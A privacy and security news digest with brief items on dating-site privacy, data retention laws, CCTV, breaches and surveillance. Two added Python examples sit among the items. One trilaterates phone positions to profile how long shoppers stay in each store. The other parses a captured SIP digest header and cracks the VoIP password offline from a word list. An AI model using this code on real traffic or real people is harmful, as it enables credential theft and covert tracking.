Today, about 40% of single adults use online dating. The problem with most dating sites is that they offer no privacy. Because profiles and photos must be searchable by other members, members are required to surrender control of sensitive personal information. Amazingly, millions of online daters willingly share this private information. However, there are also millions of single adults who avoid online dating because they place significant value on personal privacy and safety. For these people, exposing their personal lives on the public Internet for anybody and everybody to search and find is not acceptable. “Privacy and online dating should not be mutually exclusive,” explains Joel M. Blatt, founder of Sparkbliss. Sparkbliss is fueling the “private online dating” revolution. Sparkbliss works like this: each member develops a private network of trusted friends and family who can view his/her profile and make romantic introductions on their behalf. Members have complete control over who they invite into their private network. Some people add as many connections as possible, while others are more conservative. Adding “super connectors,” those people who seem to know everybody, maximizes your ability to find the right person. With online dating, people are often untruthful, superficial, and subjective. Online dating behavior is frequently disingenuous; outdated photos and plagiarized profiles are commonplace. In contrast, Sparkbliss enforces honesty and integrity, because it is moderated by people who know you. Sparkbliss goes a step further to mitigate concerns over safety by recommending that introductions include some kind of reference and testimonial. [Source]
The Australian Law Reform Commission has presented the new Government with a report that calls for a new statutory tort of privacy. The ALRC's report will be considered by the Government for about two weeks before being tabled in parliament and made public. The ALRC indicated it supported a tort of privacy in a discussion paper last year that came soon after a similar call from the NSW Law Reform Commission. It suggested that liability should be imposed for disclosing a person's correspondence or private written, oral or electronic communications. The NSW commission also wanted to impose liability for disclosing "irrelevant or embarrassing facts" about a person's private life, and for using a person's "name, identity or voice" without consent. When the ALRC outlined its scheme last year, it agreed with the NSW commission's approach to the possible remedies that courts should be able to order for breaching the statutory tort. The ALRC said it wanted the tort to apply whenever there was "a reasonable expectation of privacy and where the action that is the subject of the complaint is serious enough to cause substantial offence to an ordinary person". [Source]
The consensus at a recent Philippines technical working group meeting was that the nation should adopt the E.U. framework on data privacy when developing data privacy bills, says a report on Inquirer.net. The group will meet with Data Privacy International next month to continue working towards adopting that framework. A spokesperson for the group said that while the group is looking at models from many nations, the EU guidelines will help industry break into the European and Australian markets. “We are trying to break into these markets... We all agreed to zero in on the EU model.” [Source]
The Center For Democracy and Technology has released a briefing expressing concerns about the privacy implications of new Treasury proposals to track and retain the financial activities of cardholders. [Full Story]
A survey of 1,000 Californians finds that most are unaware of how businesses are using and selling their personal data. The study, released by UC Berkeley's Samuelson Law, Technology and Public Policy Clinic, shows that consumers are largely unaware that personal information from pizza deliveries, charitable donations, product rebate cards and other common consumer transactions is fair game for being sold. "Businesses are allowed to sell information unless consumers object," said Chris Hoofnagle, co-author of the Samuelson report. [Source] [Source]
Once the RFID systems provider completes the recently announced sale of its Xmark subsidiary, it plans to sell the rest of its assets. [Source]
Cyber criminals are becoming bolder and more sophisticated in their operations, federal computer security experts say. And that's bad news for schools, because educational institutions reportedly account for approximately one of every four data security breaches. [Source] See also: [Medical data breaches on the rise] [Data Breaches Mean More Than Bad Publicity] [Preparation Key to Managing Data Breaches] [Five IRS Employees Charged With Snooping on Tax Returns]
Schools are using CCTV cameras illegally and breaking the law by using footage as evidence in court cases, a new study has found. Every one of 60 schools picked at random was found to be ignoring strict guidelines over the use of CCTV, with one school even aiming cameras into a neighbour's back garden. The study, by national advisory body CameraWatch, found that none of the schools met the strict standards imposed by the law, and as a result evidence gathered by schools in court cases may not even be legal. The guidelines, which schools are supposed to follow, include warning people what cameras are used for and making sure that cameras are pointing in the right direction. Schools must also store recording equipment and personal data correctly. Paul Mackie, CameraWatch's compliance director, warned that images recorded by the schools' camera systems tested were grainy, poorly exposed and in most cases illegal because procedures were not adequately followed. He said that CameraWatch had provided feedback to the schools, following checks over the last two years, but its advice was ignored. Mr Mackie said: "If evidence is not correctly gathered, or if cameras fail to meet minimum standards, then it can be challenged in court." [Source]
In a 2-1 decision in September 2006, the U.S. Court of Appeals for the Sixth Circuit ruled in U.S. v. Curtis Ellison that random plate checks are not an unconstitutional invasion of privacy and that "so long as the officer had a right to be in a position to observe the defendant's license plate, any such observation and corresponding use of the information on the plate does not violate the Fourth Amendment." Ellison appealed the decision, but last October the U.S. Supreme Court refused to hear the case, letting the appeals court's decision stand as the current law of the land. In its decision, the court joined virtually every other federal jurisdiction in saying individuals have no reasonable expectation of privacy when it comes to license plate numbers. Privacy advocates disagree with the courts' findings and say they fly in the face of the federal Drivers' Privacy Protection Act, which requires a law enforcement purpose to access motor vehicle records. [Source]
Nearly three-fourths of U.S. cell phone users recently surveyed don’t want to ride in airplanes with passengers talking on phones. The results dovetail with what several airlines have apparently decided already as they prepare to roll out wireless in-flight services such as e-mail, text and instant messaging access from user devices. Those services, however, apparently will not include wireless talking. [Source]
Customers in UK shopping centres are having their every move tracked by a new type of surveillance that listens in on the whisperings of their mobile phones. The technology can tell when people enter a shopping centre, what stores they visit, how long they remain there, and what route they take as they walk around. The device cannot access personal details about a person’s identity or contacts, but privacy campaigners expressed concern about potential intrusion should the data fall into the wrong hands. The surveillance mechanism works by monitoring the signals produced by mobile handsets and then locating each phone by triangulation, measuring the phone’s distance from three receivers. It has already been installed in two UK shopping centres, and three more installations will begin next month. [Source]
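The item gives the mechanics in one clause: a distance from each of three receivers, then a position. The following added example, written for this digest and not code from the vendor or the article, works that through on constructed data: three receivers at known positions, a position fix solved from the three ranges, and the per-store dwell profile that a sequence of such fixes yields, which is the "what stores they visit, how long they remain there" the article describes. The receiver coordinates, store footprints, timestamps and handset track are all constructed; the range measurement itself (from signal timing at the receivers) is assumed to have been done and is not modelled. Strictly, fixing a point from three distances is trilateration; "triangulation" in the article is the popular term for it.

```python
"""Position fix from three ranges, and the movement profile it yields (added example)."""
import math

# Constructed receiver positions (metres, floor-plan coordinates) and store footprints
# as (xmin, ymin, xmax, ymax) rectangles. Anything outside a store is "corridor".
RECEIVERS = [(0.0, 0.0), (100.0, 0.0), (0.0, 80.0)]
ZONES = {
    "Shop A": (10, 10, 40, 40),
    "Shop B": (60, 10, 90, 40),
    "Shop C": (10, 50, 40, 70),
}
# Constructed ground truth: (timestamp in seconds, true handset position).
TRUE_TRACK = [
    (0, (5.0, 45.0)), (30, (20.0, 30.0)), (90, (30.0, 25.0)), (120, (50.0, 30.0)),
    (150, (70.0, 20.0)), (240, (80.0, 30.0)), (270, (50.0, 45.0)),
]


def trilaterate(receivers, ranges):
    """Solve (x, y) from three receivers and the handset's distance to each.

    Each receiver gives a circle (x-xi)^2 + (y-yi)^2 = di^2. Subtracting the first
    circle from the other two cancels the quadratic terms and leaves a 2x2 linear
    system, solved here by Cramer's rule.
    """
    (x1, y1), (x2, y2), (x3, y3) = receivers
    d1, d2, d3 = ranges
    a1, b1 = 2 * (x2 - x1), 2 * (y2 - y1)
    c1 = d1 ** 2 - d2 ** 2 - x1 ** 2 + x2 ** 2 - y1 ** 2 + y2 ** 2
    a2, b2 = 2 * (x3 - x1), 2 * (y3 - y1)
    c2 = d1 ** 2 - d3 ** 2 - x1 ** 2 + x3 ** 2 - y1 ** 2 + y3 ** 2
    det = a1 * b2 - a2 * b1
    if abs(det) < 1e-9:
        # Collinear receivers: the solution is mirrored across their line, so it is ambiguous.
        raise ValueError("receivers are collinear; the fix is ambiguous")
    return ((c1 * b2 - c2 * b1) / det, (a1 * c2 - a2 * c1) / det)


def observed_track():
    """What the receivers produce: one fix per sample, computed from three ranges.

    The ranges are derived here from the constructed ground truth; real receivers
    measure them from signal timing, which is not modelled.
    """
    fixes = []
    for t, true_pos in TRUE_TRACK:
        ranges = [math.dist(true_pos, r) for r in RECEIVERS]
        fixes.append((t, trilaterate(RECEIVERS, ranges)))
    return fixes


def zone_of(point, zones):
    """Name of the store footprint containing the point, or "corridor"."""
    x, y = point
    for name, (xmin, ymin, xmax, ymax) in zones.items():
        if xmin <= x <= xmax and ymin <= y <= ymax:
            return name
    return "corridor"


def dwell_times(fixes, zones):
    """Seconds spent in each zone; each fix is assumed to hold until the next one."""
    totals = {}
    for (t0, pos), (t1, _) in zip(fixes, fixes[1:]):
        zone = zone_of(pos, zones)
        totals[zone] = totals.get(zone, 0) + (t1 - t0)
    return totals


if __name__ == "__main__":
    track = observed_track()
    for t, fix in track:
        print(f"t={t:3d}s  fix=({fix[0]:6.2f}, {fix[1]:6.2f})  {zone_of(fix, ZONES)}")
    print(dwell_times(track, ZONES))
```

Note what the profile needs and what it does not: no subscriber identity, phone number or contacts are read, exactly as the vendor says, yet a persistent per-handset identifier plus timestamps is enough to build a movement and dwell record, and that record becomes personal data the moment it can be linked to a purchase or a loyalty card.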
Proposed legislation in the UK known as the Communications Data Bill would extend the data retention requirements of the Regulation of Investigatory Powers Act (RIPA), which presently requires telecommunications service providers to keep information about customers’ phone calls and text messages for one year. The new law would expand the required information to include who initiated a communication, when it occurred and its duration; the content of communications would not be retained. The information would be held in one database, which has caused some concern in light of the recent problems government entities have had with data security. Police and other law enforcement officials would be allowed access to the database with permission from the courts. [Source] [Source]
Two lawmakers are questioning whether or not Charter Communications' plan to share data about its users' Web habits violates users' privacy rights, says a report at MediaPost Publications. Charter is working with behavioral-targeting company NebuAd to pilot the technology with some of its 2.8 million users, letting NebuAd collect data about Charter customers' Web activity and then send those users ads better targeted to their interests. In a letter to Charter CEO Neil Smit, Rep. Ed Markey and Rep. Joe Barton requested that the company postpone deployment until discussions on privacy issues can take place. Charter said on Friday that it is "...pleased to discuss this matter" with the Congressmen. [Source]
Usernames and passwords for voice-over-IP (VoIP) phone accounts are selling online for more than stolen credit cards. The information allows someone to use the telephone service for free. Net telephony fraud is still in its infancy, with eavesdropping on calls being the most commonly exploited security flaw. But the move into stealing usernames and passwords, which are routinely sent across the network when a call is made, is a worrying new trend. “90% of carriers don’t offer a secure VoIP service.” [Source]
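For SIP, the usernames and passwords "routinely sent across the network" are the HTTP-style digest in the Authorization header of every REGISTER or INVITE. The following added example, written for this digest and not code from the article or from any carrier, shows what a passive eavesdropper on an unencrypted link captures and why it is enough: the digest is MD5 over the password and values that all travel in the same packet, so the password can be guessed offline at full speed with no further contact with the carrier. The account, realm, nonce, password and word list are constructed. The digest is the qop-less form of RFC 2617, which most SIP deployments of the period used (an assumption; with qop=auth the response also covers nc and cnonce, both of which are in the header too, so the attack is unchanged).

```python
"""SIP digest authentication on the wire, and the offline attack it permits (added example)."""
import hashlib
import re


def md5hex(text: str) -> str:
    return hashlib.md5(text.encode()).hexdigest()


def sip_digest_response(username, realm, password, method, uri, nonce):
    """RFC 2617 digest without qop: MD5(HA1:nonce:HA2),
    where HA1 = MD5(user:realm:password) and HA2 = MD5(method:uri)."""
    ha1 = md5hex(f"{username}:{realm}:{password}")
    ha2 = md5hex(f"{method}:{uri}")
    return md5hex(f"{ha1}:{nonce}:{ha2}")


def build_register(username, realm, password, nonce, host):
    """The request a softphone sends after a 401 challenge carrying `nonce`."""
    uri = f"sip:{host}"
    resp = sip_digest_response(username, realm, password, "REGISTER", uri, nonce)
    return (
        f"REGISTER {uri} SIP/2.0\r\n"
        f"From: <sip:{username}@{host}>;tag=a1b2\r\n"
        f"To: <sip:{username}@{host}>\r\n"
        f'Authorization: Digest username="{username}", realm="{realm}", '
        f'nonce="{nonce}", uri="{uri}", response="{resp}", algorithm=MD5\r\n'
        "Content-Length: 0\r\n\r\n"
    )


# name="quoted value" or name=token, as they appear in the Digest header
_PARAM = re.compile(r'(\w+)=(?:"([^"]*)"|([^,\s]+))')


def parse_capture(packet: str) -> dict:
    """Everything the offline attack needs, pulled from one captured request."""
    method = packet.split(" ", 1)[0]
    for line in packet.split("\r\n"):
        if line.lower().startswith("authorization:"):
            body = line.split("Digest", 1)[1]
            fields = {m.group(1): m.group(2) if m.group(2) is not None else m.group(3)
                      for m in _PARAM.finditer(body)}
            fields["method"] = method
            return fields
    raise ValueError("no Authorization header in capture")


def crack_sip_password(auth: dict, wordlist):
    """Recompute the digest for each candidate; the first match is the password.

    Nothing here touches the network: username, realm, nonce, uri and the
    expected response were all in the captured packet.
    """
    for candidate in wordlist:
        guess = sip_digest_response(auth["username"], auth["realm"], candidate,
                                    auth["method"], auth["uri"], auth["nonce"])
        if guess == auth["response"]:
            return candidate
    return None


# Constructed capture: one REGISTER as it would cross an unencrypted link.
CAPTURED = build_register("2015551234", "voip.example.net", "phone2008",
                          "5f1a9c3e7b", "voip.example.net")
WORDLIST = ["letmein", "123456", "password", "phone2008", "summer08"]

if __name__ == "__main__":
    fields = parse_capture(CAPTURED)
    print("captured:", {k: fields[k] for k in ("username", "realm", "nonce", "uri", "response")})
    print("recovered password:", crack_sip_password(fields, WORDLIST))
```

The server's nonce does not help against this: the eavesdropper has it too, so digest authentication stops replay of a captured response but not offline guessing of the secret behind it. The "secure VoIP service" the closing quote refers to is transport protection, SIP over TLS for signalling so the Authorization header never crosses the wire in the clear, and SRTP for the media.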
In a situation reminiscent of the HP scandal a few years back in the US, Deutsche Telekom is suspected of having snooped on communications to determine the source of leaks to the media involving sensitive information. The Deutsche Telekom internal security unit allegedly used stored information, including numbers dialed, dates and durations of calls, to look for connections between Telekom executives and media reporters. The breaches allegedly took place three years ago, and both public prosecutors and a private law firm are investigating. No calls were tapped, according to Telekom, but the stored data were accessed without authorization. The German government is urging Deutsche Telekom to be forthcoming with information about how investigators obtained the information. [Source] [Source] [Source] [Source]
Government employees, contractors and consultants with access to DHS computer systems are among those whose names and personal information will be kept in a newly created database, according to a notice posted in the Federal Register. The General Information Technology Access Account Records System (GITAARS) will collect and store information on everyone with regular access to departmental IT systems. Use and distribution of the GITAARS system of records is to be regulated by the Privacy Act of 1974. Public comments on the proposed database are due by June 16. The database will contain names, business affiliations, positions, phone numbers, citizenship, home addresses, e-mail addresses, access records, date and time of access, logs of Internet activity and the Internet protocol address of access. The information will be shared routinely with other government agencies for purposes such as workforce surveys, in addition to auditing and oversight. In some cases, DHS will provide additional information, the notice stated: “In some cases DHS must provide ... other information such as: occupation group/family, organization, supervisory status, grade, work role, duty station, series, pay plan, service in government, highest level of education, years of professional service, years of service in government, projected retirement, position title, work phone number and work address,” the notice said.
The department also proposed routinely sharing business contact information available in the database and information that might relate to an investigation of identity theft. In a separate Federal Register notice, DHS’ Office of Intelligence and Analysis intends to create a new Enterprise Records System to track the investigation of people suspected of terrorist threats and activity, including threats against critical infrastructure such as key computer systems. The Bush administration is proposing that the new intelligence database be exempt, for national security purposes, from most Privacy Act rules and notifications. The new Enterprise Records System will apply to persons suspected of being involved in threats, which includes cyberthreats against critical infrastructure computer systems, according to the notice. The database covers activities meant to “identify, create, or exploit” the vulnerabilities of key resources such as “the cyber and national telecommunications infrastructure and availability of a viable national security and emergency preparedness communications infrastructure,” the notice said. Investigations of people suspected of financial crimes, including those conducted through identity theft, computer fraud and computer-based attacks, are also to be included in the database. [Source]
An influential group of MPs has urged the government to seek assurances from Washington that the Patriot Act would not be used to access personal data contained in the UK census if it is outsourced to US defence contractor Lockheed Martin. The cross-party Treasury Select Committee is making the call today as part of the results of an investigation into the upcoming census in 2011. The once-per-decade data-gathering exercise is used by government departments to target billions of pounds of public spending, but has been criticised as unable to cope with a more mobile population. Lockheed Martin, whose corporate slogan is "We never forget who we're working for", is bidding against Deutsche Telekom's T-Systems division for the £450m contract to run what is reckoned will be the last census in its traditional centralised form. The Office for National Statistics (ONS) is expected to announce the winner in June. Lockheed's potential involvement has been opposed by anti-arms-industry campaigners, including the Green Party, and by privacy advocates. [Source]
New York Governor David Paterson has introduced legislation aimed at protecting citizens from identity fraud and theft. The bill would restrict how employers may use employees’ personal information and would allow residents of New York to put their names on “exclusion lists.” In addition, the bill would make it a crime to possess a skimmer device with intent to use it to commit data theft. [Source] See also: [Utah Lawmaker Likes Identity Locks for Children] See also: [Utah targets ID theft of children] and [Hawaiian Governor Signs Bill to Protect Hawaii Residents Against Identity Theft]
Pharmacies in California would be allowed to sell confidential patient prescription information to third-party marketing firms working for drug companies under a bill expected to be voted on Thursday by the state Senate. The legislation would allow pharmaceutical firms to send mailings directly to patients. Supporters of the proposal say the intent is to remind patients to take their medicine and order refills. But consumer privacy advocates are outraged. "This bill would be a windfall for corporations seeking to track, buy and sell a patient's private medical records," said the Consumer Federation of California. "This would represent a significant intrusion by pharmaceutical companies into the privacy of patients." [Source] See also: [Hospitals, patients clash on privacy rights]
Should political flame-throwers have to identify themselves in the paid ads they place in newspapers or the campaign fliers they drop on doorsteps? Under current state law, the answer is yes. But a bill to repeal those requirements is headed for a House vote this week after a brief - but fiery - floor debate last week that was cut short by the chamber's Democratic leaders. [Source]
In its 5th annual study of outbound e-mail and data loss prevention issues, Proofpoint found that large enterprises continue to incur risk from, and take action against, information leaks over outbound e-mail, as well as newer communications media such as blogs, message boards, media sharing sites and mobile devices. Outbound e-mail remains a key source of risk for U.S. enterprises, with a record 44% of surveyed companies reporting that they investigated an e-mail leak of confidential information in the past 12 months. Other key findings in the survey, covering activities in the past 12 months, include:
Israeli labor and employer organizations have come to a consensus on the degree of privacy employees should have while using a workplace computer, and on what access employers should be permitted. The draft agreement, currently under review by the Coordinating Bureau of Economic Organizations, is a form of the European model, which is generally considered to give employees a strong level of privacy. If approved, all workplaces may institute the framework. Shlomo Neuman, who was involved in the formulation of the agreement, said the groups based their work on European precedents “so as to balance the employer’s right to property and the employee’s right to privacy.” [Source]
TJX Companies has fired an employee from a Kansas TJ Maxx store for making posts to a forum about the company’s lax security practices, which he said persisted even after the company's widely reported breach. The employee said in several posts that, except for a period following the breach disclosure when a strong password policy was enforced, the employee password on his store’s server was set to blank. In addition, at one point a store server was running in administrator mode. When he began work at TJX, his password was the same as his user name. TJX says he was fired for disclosing confidential company information. [Source] [Source]
--------